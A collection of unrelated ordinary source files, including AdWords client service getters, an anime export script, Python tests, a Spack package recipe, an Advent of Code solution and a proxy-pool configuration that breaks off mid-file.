return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'BidLandscapeService')
def GetBudgetOrderService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in BudgetOrderService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of BudgetOrderService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'billing',
'default_group': 'billing',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'BudgetOrderService')
def GetBulkMutateJobService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in BulkMutateJobService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of BulkMutateJobService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'BulkMutateJobService')
def GetMutateJobService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in MutateJobService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of BulkMutateJobService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'MutateJobService')
def GetCampaignAdExtensionService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in CampaignAdExtensionService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of CampaignAdExtensionService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'CampaignAdExtensionService')
def GetCampaignCriterionService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in CampaignCriterionService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of CampaignCriterionService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'CampaignCriterionService')
def GetCampaignService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in CampaignService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' or
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of CampaignService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'CampaignService')
def GetCampaignTargetService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in CampaignTargetService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of CampaignTargetService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
AdWordsSanityCheck.ValidateService('CampaignTargetService', version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'CampaignTargetService')
def GetCreateAccountService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in CreateAccountService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of CreateAccountService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
AdWordsSanityCheck.ValidateService('CreateAccountService', version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'mcm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'CreateAccountService')
def GetConstantDataService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in ConstantDataService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of ConstantDataService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'ConstantDataService')
def GetCustomerService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in CustomerService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of CustomerService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'mcm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'CustomerService')
def GetCustomerSyncService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in CustomerSyncService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of CustomerSyncService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'ch',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'CustomerSyncService')
def GetExperimentService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in ExperimentService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of ExperimentService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'ExperimentService')
def GetGeoLocationService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in GeoLocationService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of GeoLocationService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'GeoLocationService')
def GetInfoService(self, server='https://adwords.google.com', version=None,
http_proxy=None):
"""Call API method in InfoService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' or
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of InfoService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'info',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'InfoService')
def GetLocationCriterionService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in LocationCriterionService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' or
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
LocationCriterionService New instance of LocationCriterionService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'LocationCriterionService')
def GetManagedCustomerService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in ManagedCustomerService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of ManagedCustomerService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'mcm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'ManagedCustomerService')
def GetMediaService(self, server='https://adwords.google.com', version=None,
http_proxy=None):
"""Call API method in MediaService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' or
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of MediaService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'MediaService')
def GetReportDefinitionService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in ReportDefinitionService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' or
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of ReportDefinitionService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'ReportDefinitionService')
def GetReportDownloader(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Returns an instance of ReportDownloader, used to download reports.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
ReportService New instance of ReportDownloader object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return ReportDownloader(headers, self._config, op_config, self.__logger)
def GetServicedAccountService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in ServicedAccountService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of ServicedAccountService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
AdWordsSanityCheck.ValidateService('ServicedAccountService', version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'mcm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'ServicedAccountService')
def GetTargetingIdeaService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in TargetingIdeaService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of TargetingIdeaService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'o',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'TargetingIdeaService')
def GetTrafficEstimatorService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in TrafficEstimatorService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of TrafficEstimatorService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'o',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'TrafficEstimatorService')
def GetUserListService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in UserListService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of UserListService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'UserListService')
def GetConversionTrackerService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in ConversionTrackerService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of ConversionTrackerService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'ConversionTrackerService')
def GetDataService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in DataService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of DataService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'DataService')
def _GetOAuthScope(self, server='https://adwords.google.com'):
"""Retrieves the OAuth Scope to use.
Args:
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' for sandbox. The default behavior
is to access live site.
Returns:
str Full scope to use for OAuth.
"""
return server + '/api/adwords/'
| StarcoderdataPython |
1788788 | <gh_stars>0
"""
This script adds a missing "duration" field for every anime in the list retrieved via official myanimelist export api(https://myanimelist.net/panel.php?go=export)
"""
import sys
from typing import Optional
import xml.etree.ElementTree as ET
from mal import Anime
def get_duration(amime_id: int) -> Optional[str]:
return Anime(amime_id).duration
def modify(path: str):
tree = ET.parse(path)
root = tree.getroot()
counter = 0
global_len = len(root)
for element in root:
if element.tag == "anime":
counter += 1
try:
duration: str = get_duration(int(element.find("series_animedb_id").text))
except Exception as e:
print("Exception while updating %d/%d - %s -> %s" % (counter, global_len, element.find("series_title").text, e))
continue
duration_element = ET.Element("duration")
duration_element.text = duration
duration_element.tail = "\n "
element.insert(1, duration_element)
print("Updating %d/%d - %s -> %s" % (counter, global_len, element.find("series_title").text, duration))
tree.write(path, encoding="utf-8", xml_declaration=True)
print("Overwrite is successful: %s" % path)
if __name__ == "__main__":
modify(sys.argv[1])
print("Work is done!")
| StarcoderdataPython |
162431 | #!/usr/bin/env bash
# This script trims wiki dumps into only relevant information.
# The output is:
# - results/pages_trimmed containing page id, namespace, title
# - results/links_trimmed containing pade id (from), namespace, title (to)
# This should be further parsed by parse_and_save to construct edges as
# (src id, dst id) which can be parsed and partitioned into partitions and
# disjoint logical data objects.
# Author: <NAME>
echo "Pages file is $1"
echo "Links file is $2"
RDIR=result/trim
mkdir -p ${RDIR}
echo ""
echo "Trimming pages ..."
grep INSERT $1 > ${RDIR}/pages
echo "Done trimming pages"
echo ""
echo "Trimming links ..."
grep INSERT $2 > ${RDIR}/links
echo "Done trimming links"
| StarcoderdataPython |
4841734 | from model import *
import matplotlib.pyplot as plt
model = VirusModel(num_nodes=10, avg_node_degree=2, initial_outbreak_size=1, alpha=0.05, beta=0.05, gamma=0.03)
# while number_infected(model)>0:
# model.step()
for n in range(10):
model.step()
df = model.datacollector.get_model_vars_dataframe()
df.plot()
plt.xlabel('Time (Days)')
plt.ylabel('Number of Individuals')
plt.show() | StarcoderdataPython |
3237638 | """Connections to ADODB data sources from Kukur.
This requires an installation of pywin32 (LGPL).
"""
# SPDX-FileCopyrightText: 2021 Timeseer.AI
# SPDX-License-Identifier: Apache-2.0
try:
import adodbapi
HAS_ADODB = True
except ImportError:
HAS_ADODB = False
from kukur.source.metadata import MetadataValueMapper
from kukur.source.quality import QualityMapper
from kukur.source.sql import BaseSQLSource, SQLConfig
class ADODBNotInstalledError(Exception):
"""Raised when the adodbapi module of pywin32 is not available."""
def __init__(self):
Exception.__init__(
self, "the adodbapi modules is not available. Install pywin32."
)
def from_config(
data, metadata_value_mapper: MetadataValueMapper, quality_mapper: QualityMapper
):
"""Create a new ADODB data source from a configuration dict.
Raises ADODBNotInstalledError when the adodbapi module is not available."""
if not HAS_ADODB:
raise ADODBNotInstalledError()
config = SQLConfig.from_dict(data)
return ADODBSource(config, metadata_value_mapper, quality_mapper)
class ADODBSource(BaseSQLSource):
"""An ADODB data source."""
def __init__(
self,
config: SQLConfig,
metadata_value_mapper: MetadataValueMapper,
quality_mapper: QualityMapper,
):
super().__init__(config, metadata_value_mapper, quality_mapper)
if not HAS_ADODB:
raise ADODBNotInstalledError()
def connect(self):
return adodbapi.connect(self._config.connection_string)
| StarcoderdataPython |
12482 | #!/usr/bin/env python
from argparse import ArgumentParser
import sys
from comp_pi import compute_pi
def main():
arg_parser = ArgumentParser(description='compute pi using Fortran '
'function')
arg_parser.add_argument('n', default=1000, nargs='?',
help='number of random points')
options = arg_parser.parse_args()
print(compute_pi(options.n))
return 0
if __name__ == '__main__':
status = main()
sys.exit(status)
| StarcoderdataPython |
1617814 | <reponame>BenWibking/spack
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class TreeSitter(MakefilePackage):
"""Tree-sitter is a parser generator tool and an incremental parsing library.
It can build a concrete syntax tree for a source file and
efficiently update the syntax tree as the source file is edited."""
homepage = "https://tree-sitter.github.io/tree-sitter/"
url = "https://github.com/tree-sitter/tree-sitter/archive/refs/tags/v0.20.1.tar.gz"
maintainers = ['albestro']
version('0.20.1', sha256='12a3f7206af3028dbe8a0de50d8ebd6d7010bf762db918acae76fc7585f1258d')
def edit(self, spec, prefix):
env['PREFIX'] = prefix
| StarcoderdataPython |
4809431 | import os
import textwrap
from dvc.main import main
def test_cache_dir_local(tmp_dir, dvc, capsys, caplog):
(tmp_dir / ".dvc" / "config.local").write_text(
textwrap.dedent(
"""\
[cache]
dir = some/path
"""
)
)
path = os.path.join(dvc.dvc_dir, "some", "path")
assert main(["cache", "dir", "--local"]) == 0
out, _ = capsys.readouterr()
assert path in out
assert main(["cache", "dir"]) == 0
out, _ = capsys.readouterr()
assert path in out
assert main(["cache", "dir", "--project"]) == 251
assert "option 'dir' doesn't exist in section 'cache'" in caplog.text
| StarcoderdataPython |
53982 | <filename>spinner.py
#!/usr/bin/python
import sys, time
while True:
for i in ['\o/', '\o>', '<o>', '<o/']:
sys.stdout.write('\r%s' % i);
sys.stdout.flush();
time.sleep(0.1)
| StarcoderdataPython |
4842895 | # -*- coding: utf-8 -*-
from random import randint, random
import numpy as np
from npstreams import idot, itensordot, iinner, ieinsum, last
import pytest
def test_idot_against_numpy_multidot():
"""Test against numpy.linalg.multi_dot in 2D case"""
stream = [np.random.random((8, 8)) for _ in range(7)]
from_numpy = np.linalg.multi_dot(stream)
from_stream = last(idot(stream))
assert from_numpy.shape == from_stream.shape
assert np.allclose(from_numpy, from_stream)
@pytest.mark.parametrize("axis", (0, 1, 2))
def test_itensordot_against_numpy_tensordot(axis):
"""Test against numpy.tensordot in 2D case"""
stream = tuple(np.random.random((8, 8)) for _ in range(2))
from_numpy = np.tensordot(*stream)
from_stream = last(itensordot(stream))
assert from_numpy.shape == from_stream.shape
assert np.allclose(from_numpy, from_stream)
@pytest.mark.parametrize("axis", (0, 1, 2))
def test_iinner_against_numpy_inner(axis):
"""Test against numpy.tensordot in 2D case"""
stream = tuple(np.random.random((8, 8)) for _ in range(2))
from_numpy = np.inner(*stream)
from_stream = last(iinner(stream))
assert from_numpy.shape == from_stream.shape
assert np.allclose(from_numpy, from_stream)
def test_ieinsum_against_numpy_einsum():
"""Test against numpy.einsum"""
a = np.arange(60.0).reshape(3, 4, 5)
b = np.arange(24.0).reshape(4, 3, 2)
stream = [a, b]
from_numpy = np.einsum("ijk,jil->kl", a, b)
from_stream = last(ieinsum(stream, "ijk,jil->kl"))
assert from_numpy.shape == from_stream.shape
assert np.allclose(from_numpy, from_stream)
| StarcoderdataPython |
1681856 | <reponame>zzl0/aoc
from utils import *
@dataclass
class Password:
first: int
second: int
char: str
password: str
@classmethod
def of(cls, s):
# '1-3 b: cdefg' -> ('1', '3', 'b', 'cdefg')
l, h, c, password = re.findall(r'[^-:\s]+', s)
return cls(int(l), int(h), c, password)
def isValid1(self) -> bool:
return self.first <= self.password.count(self.char) <= self.second
def isValid2(self) -> bool:
return sum(self.password[i - 1] == self.char for i in (self.first, self.second)) == 1
def day2_1(passwords: List[Password]) -> int:
return sum(p.isValid1() for p in passwords)
def day2_2(passwords: List[Password]) -> int:
return sum(p.isValid2() for p in passwords)
if __name__ == "__main__":
passwords = data(2, Password.of)
print(f'day2_1: {day2_1(passwords)}')
print(f'day2_2: {day2_2(passwords)}')
# day2_1: 418
# day2_2: 616
| StarcoderdataPython |
1736577 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Auther: <NAME>
#
# This file is part of Mini Proxy Pool
#
# This program is free software and it is distributed under
# the terms of the MIT license. Please see LICENSE file for details.
PROXY_DB_FILE = "_proxies.db"
VALIDATOR_TIMEOUT = 1 # seconds
VALIDATOR_URL = "http://www.google.ca"
VALIDATOR_THREAD_POOL_SIZE = 20
VALIDATOR_CONNECTIONS_PER_THREAD = 20
INVALID_PROXY_TIMES = 5 # if a proxy cannot be connected for VALIDATOR_DEFINE_INVALID_TIMES time, it is defined as invalid
INVALID_PROXY_IF_DELETE = True
VALIDATE_THREAD_RUN_PERIOD = 5 * 60 # seconds wait after each validation
LOAD_PORXIES_FROM_SOURCES_THREAD_RUN_PERIOD = 30 * 60 # seconds wait after each loading from sites
REST_SRV_IP = "0.0.0.0"
REST_SRV_PORT = 9876
REST_API_PATH_GET_ALL_VALID = "/api/v1/proxies/*"
# Free proxy sites
PROXY_SOURCE_SITES = [
{
'url_base': "https://free-proxy-list.net",
'pattern': "((?:\d{1,3}\.){1,3}\d{1,3})<\/td><td>(\d{1,6})(.{1,200})<td class='hx'>(.{2,3})",
'ip_ind': 0,
'port_ind': 1,
'protocal_ind': 3
},
{
'url_base': 'https://www.us-proxy.org',
'pattern': "((?:\d{1,3}\.){1,3}\d{1,3})<\/td><td>(\d{1,6})(.{1,200})<td class='hx'>(.{2,3})",
'ip_ind': 0,
'port_ind': 1,
'protocal_ind': 3 # todo: to specify the protocol: http or https
},
{
'url_base': "http://spys.me/proxy.txt",
'pattern': '((?:\d{1,3}\.){1,3}\d{1,3}):(\d{1,6})',
'ip_ind': 0,
'port_ind': 1,
'protocal_ind': None
}
]
PROXY_SOURCE_FILES = [
'custom_proxies_list.txt'
]
DEFAULT_HEADERS = {
